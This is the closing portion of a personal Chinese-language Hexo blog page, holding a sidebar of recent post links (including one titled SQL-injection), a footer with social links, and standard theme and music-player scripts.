            <a class="list-group-item" href="/2022/05/11/SQL-injection/"><i class="fa  fa-book"></i> SQL-injection</a>
            
          
        
          
          
            <a class="list-group-item" href="/2022/05/11/SQL/"><i class="fa  fa-book"></i> SQL</a>
            
          
        
          
          
            <a class="list-group-item" href="/2022/05/10/Windows-SQSC/"><i class="fa  fa-book"></i> Windows 服务快捷启动命令</a>
            
          
        
          
          
            <a class="list-group-item" href="/2022/05/10/xHTML/"><i class="fa  fa-book"></i> WEB的基础教程</a>
            
          
        
          
          
            <a class="list-group-item" href="/2022/05/10/World/"><i class="fa  fa-book"></i> holle World</a>
            
          
        
      </ul>
  </div>
  </aside>

            
    </div>
</section>
        
        </div>
    </div>
</div>
<footer>
    <div id="footer"  class="ap-lrc"  >
        <div class="container">
            <div class="row">
                <div class="col-md-6 col-md-offset-3 footer-list text-center">
                    <ul class="kratos-social-icons">
                        
                        <li><a href="mailto:13765457519@163.com"><i class="fa fa-envelope"></i></a></li>
                        <li><a target="_blank" rel="nofollow" href="https://t.me/link zero"><i class="fa fa-telegram"></i></a></li>
                        
                        
                        
                        <li><a target="_blank" rel="me" href="https://nya.one/@XKLibra"><i class="fa fa fa-share-alt-square"></i></a></li>
                        <li><a target="_blank" rel="nofollow" href="https://github.com/XKLibra"><i class="fa fa-github"></i></a></li>
                        
                    </ul>
                    <ul class="kratos-copyright">
                        <div>
                            <li>&copy; 2022 XKLibra 版权所有.</li>
                            <li>本站已运行<span id="span_dt">Loading...</span></li>
                        </div>
                        <div>
                            <li>Theme <a href="https://github.com/Candinya/Kratos-Rebirth" target="_blank">Kratos:Rebirth</a></li>
                            <li>Site built with&nbsp;<i class="fa fa-heart throb" style="color:#d43f57"></i>&nbsp;by XKLibra.</li>
                        </div>
                        <div>
                            <li>Powered by <a href="https://hexo.io" target="_blank" rel="nofollow">Hexo</a></li>
                            <li>Hosted on <a href="https://github.io" target="_blank">Github Pages</a></li>
                        </div>
                        <div>
                            
                            
                        </div>
                    </ul>
                </div>
            </div>
        </div>
        <div class="kr-tool text-center">
            <div class="tool">
                
                    <div class="box search-box">
                        <a href="/search/">
                            <span class="fa fa-search"></span>
                        </a>
                    </div>
                
                
                    <div class="box theme-box" id="darkmode-switch">
                        <span class="fa fa-adjust"></span>
                    </div>
                
                
            </div>
            <div class="box gotop-box">
                <span class="fa fa-chevron-up"></span>
            </div>
        </div>
    </div>
</footer>
</div>
</div>

        <script defer src="https://unpkg.com/bootstrap@3.3.4/dist/js/bootstrap.min.js"></script>
<script defer src="https://unpkg.com/nprogress@0.2.0/nprogress.js"></script>
<script>
    if (!window.kr) {
        window.kr = {};
    }
    window.kr.notMobile = (!(navigator.userAgent.match(/(phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone)/i)));
    window.kr.siteRoot = "/";
</script>


    <script async src="/js/candy.min.js"></script>



    <script defer src="https://unpkg.com/aplayer@1.10.1/dist/APlayer.min.js"></script>
    
    <script defer src="https://unpkg.com/meting@2/dist/Meting.min.js"></script>
    <meting-js
        server="netease"
        type="playlist"
        id="7427065207"
        order="random"
        fixed="true"
    >
    </meting-js>



    <script defer src="https://unpkg.com/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>

<script defer src="https://unpkg.com/clipboard@2.0.6/dist/clipboard.min.js"></script>
<script defer src="/js/kratosr.min.js"></script>
<script defer src="/js/pjax.min.js"></script>



<!-- Extra support for third-party plguins  -->


    </body>
</html>